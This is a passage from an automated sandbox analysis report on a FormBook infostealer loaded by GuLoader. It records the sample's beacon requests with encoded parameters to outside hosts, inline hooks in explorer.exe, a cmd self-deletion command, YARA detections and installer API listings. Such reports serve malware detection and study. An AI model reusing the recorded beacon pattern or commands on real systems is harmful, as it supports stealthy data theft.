7	192.168.11.20	50021	154.197.227.142	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 22:59:57.794441938 CEST	242	OUT	GET /ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.fathomtackle.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 22:59:59.100063086 CEST	243	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 12 Oct 2023 04:59:15 GMT Content-Type: text/html Content-Length: 466 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	50022	185.104.28.238	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 23:00:16.443831921 CEST	243	OUT	GET /ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.digitalserviceact.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 23:00:16.782454014 CEST	244	IN	HTTP/1.1 404 Not Found date: Wed, 11 Oct 2023 21:00:16 GMT server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30 content-length: 203 content-type: text/html; charset=iso-8859-1 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6f 31 32 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ro12/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	50023	15.197.142.173	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 23:00:36.461050034 CEST	245	OUT	GET /ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.ddbetting.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 23:00:36.693012953 CEST	245	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Wed, 11 Oct 2023 21:00:36 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE8
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE8
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE8
GetMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE8

Target ID:	0
Start time:	22:55:10
Start date:	11/10/2023
Path:	C:\Users\user\Desktop\MaMsKRmgXZ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\MaMsKRmgXZ.exe
Imagebase:	0x400000
File size:	1'239'576 bytes
MD5 hash:	CED4AF5A976FB361BFDED06260F5985F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.9888945373.0000000005969000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:55:36
Start date:	11/10/2023
Path:	C:\Users\user\Desktop\MaMsKRmgXZ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\MaMsKRmgXZ.exe
Imagebase:	0x400000
File size:	1'239'576 bytes
MD5 hash:	CED4AF5A976FB361BFDED06260F5985F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:55:52
Start date:	11/10/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff692610000
File size:	4'849'904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	22:55:55
Start date:	11/10/2023
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cscript.exe
Imagebase:	0xc0000
File size:	144'896 bytes
MD5 hash:	13783FF4A2B614D7FBD58F5EEBDEDEF6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	22:55:59
Start date:	11/10/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\MaMsKRmgXZ.exe"
Imagebase:	0xb40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:55:59
Start date:	11/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff67de50000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	21.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.9%
Total number of Nodes:	1540
Total number of Limit Nodes:	47

Executed Functions

Function 00403235 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040325A
GetVersion.KERNEL32 ref: 00403260
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403293
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032CF
OleInitialize.OLE32(00000000), ref: 004032D6
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032F2
GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00403307
CharNextA.USER32(00000000,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",00000020,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",00000000,?,00000006,00000008,0000000A), ref: 00403343
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403440
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403451
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040345D
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403471
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403479
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040348A
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403492
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004034A6

Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?), ref: 0040639F

Part of subcall function 004037F7: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Nagari Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Nagari Setup: Installing,00000000,00000002,751D3410), ref: 004038E7
Part of subcall function 004037F7: lstrcmpiA.KERNEL32(?,.exe), ref: 004038FA
Part of subcall function 004037F7: GetFileAttributesA.KERNEL32(Call), ref: 00403905
Part of subcall function 004037F7: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E
Part of subcall function 004037F7: RegisterClassA.USER32(00422EA0), ref: 0040398B

Part of subcall function 0040371D: CloseHandle.KERNEL32(000002C8,00403554,?,?,00000006,00000008,0000000A), ref: 00403728

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403554
ExitProcess.KERNEL32 ref: 00403575
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403692
OpenProcessToken.ADVAPI32(00000000), ref: 00403699
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036B1
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036D0
ExitWindowsEx.USER32(00000002,80040002), ref: 004036F4
ExitProcess.KERNEL32 ref: 00403717

Part of subcall function 004056F6: MessageBoxIndirectA.USER32(00409218), ref: 00405751

Strings

TMP, xrefs: 0040348D
Error launching installer, xrefs: 0040350C
~nsu, xrefs: 00403580
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens, xrefs: 00403425, 00403526, 004035D0, 004035D9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae, xrefs: 00403531
1033, xrefs: 004034A1
\Temp, xrefs: 00403457
SeShutdownPrivilege, xrefs: 004036AB
Low, xrefs: 00403473
C:\Users\user\Desktop, xrefs: 004035A7, 004035AC, 004035D8
"C:\Users\user\Desktop\MaMsKRmgXZ.exe", xrefs: 0040330D, 00403313, 004034CA
TEMP, xrefs: 00403485
NSIS Error, xrefs: 004032F8
C:\Users\user\AppData\Local\Temp\, xrefs: 00403435, 0040343A, 00403450, 0040345C, 0040346B, 00403478, 00403484, 0040348C, 00403585, 00403596, 004035A1, 004035AD, 004035BA, 004035C9, 00403678
C:\Users\user\Desktop\MaMsKRmgXZ.exe, xrefs: 00403632
", xrefs: 00403368
.tmp, xrefs: 0040359C
UXTHEME, xrefs: 00403287, 0040328C, 00403292

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\MaMsKRmgXZ.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae$C:\Users\user\Desktop$C:\Users\user\Desktop\MaMsKRmgXZ.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3776617018-1923197874
Opcode ID: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
Instruction ID: 70de6b230954929a2c0fab4aa6e61a8dc1a32ac2bd4530e0982157a086cffda4
Opcode Fuzzy Hash: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
Instruction Fuzzy Hash: 62C1F6706086526AE7216F759D49B2F3EA8EB81706F04453FF541B61E2CB7C8E05CB2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040523F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040529E
GetDlgItem.USER32(?,000003EE), ref: 004052AD
GetClientRect.USER32(?,?), ref: 004052EA
GetSystemMetrics.USER32(00000002), ref: 004052F1
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405312
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405323
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405336
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405344
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405357
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405379
ShowWindow.USER32(?,00000008), ref: 0040538D
GetDlgItem.USER32(?,000003EC), ref: 004053AE
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053BE
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053D7
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053E3
GetDlgItem.USER32(?,000003F8), ref: 004052BC

Part of subcall function 0040409D: SendMessageA.USER32(00000028,?,00000001,00403ECD), ref: 004040AB

GetDlgItem.USER32(?,000003EC), ref: 004053FF
CreateThread.KERNEL32(00000000,00000000,Function_000051D3,00000000), ref: 0040540D
CloseHandle.KERNELBASE(00000000), ref: 00405414
ShowWindow.USER32(00000000), ref: 00405437
ShowWindow.USER32(?,00000008), ref: 0040543E
ShowWindow.USER32(00000008), ref: 00405484
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054B8
CreatePopupMenu.USER32 ref: 004054C9
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054DE
GetWindowRect.USER32(?,000000FF), ref: 004054FE
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405517
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405553
OpenClipboard.USER32(00000000), ref: 00405563
EmptyClipboard.USER32 ref: 00405569
GlobalAlloc.KERNEL32(00000042,?), ref: 00405572
GlobalLock.KERNEL32(00000000), ref: 0040557C
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405590
GlobalUnlock.KERNEL32(00000000), ref: 004055A9
SetClipboardData.USER32(00000001,00000000), ref: 004055B4
CloseClipboard.USER32 ref: 004055BA

Strings

Nagari Setup: Installing, xrefs: 0040552F

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Nagari Setup: Installing
API String ID: 590372296-2059581374
Opcode ID: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
Instruction ID: b9a96890980d2d8b9797d0de0d5ce2eab2fec2a682b8a0b11cb6d69254f0e8d6
Opcode Fuzzy Hash: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
Instruction Fuzzy Hash: C4A15CB1900208BFDB119FA0DD89AAE7FB9FB48355F00403AFA05B61A0C7B55E51DF69

Uniqueness

Uniqueness Score: -1.00%

Function 6EC01A98 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6EC01215: GlobalAlloc.KERNEL32(00000040,6EC01233,?,6EC012CF,-6EC0404B,6EC011AB,-000000A0), ref: 6EC0121D

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6EC01BC4
lstrcpyA.KERNEL32(00000008,?), ref: 6EC01C0C
lstrcpyA.KERNEL32(00000408,?), ref: 6EC01C16
GlobalFree.KERNEL32(00000000), ref: 6EC01C29
GlobalFree.KERNEL32(?), ref: 6EC01D09
GlobalFree.KERNEL32(?), ref: 6EC01D0E
GlobalFree.KERNEL32(?), ref: 6EC01D13
GlobalFree.KERNEL32(00000000), ref: 6EC01EFA
lstrcpyA.KERNEL32(?,?), ref: 6EC02098
GetModuleHandleA.KERNEL32(00000008), ref: 6EC02114
LoadLibraryA.KERNEL32(00000008), ref: 6EC02125
GetProcAddress.KERNEL32(?,?), ref: 6EC0217E
lstrlenA.KERNEL32(00000408), ref: 6EC02198

Memory Dump Source

Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true

Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 3cadceef18f6b3d3a7e34802550deb3ad6c24129fbe9153c282a53de1c38a57b
Instruction ID: 3bbd777f76241921911b02f7b855f4d0b738efecce70c92fc407dd37c3bd6dd5
Opcode Fuzzy Hash: 3cadceef18f6b3d3a7e34802550deb3ad6c24129fbe9153c282a53de1c38a57b
Instruction Fuzzy Hash: D222AB7191420ADEDB948FEE88947EDFBF4FB0630CF10452ED1A5A3184E7769A89CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004057A2 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057CB
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405813
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040583A
FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584B
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058F8
FindClose.KERNEL32(00000000), ref: 00405909

Strings

"C:\Users\user\Desktop\MaMsKRmgXZ.exe", xrefs: 004057A2
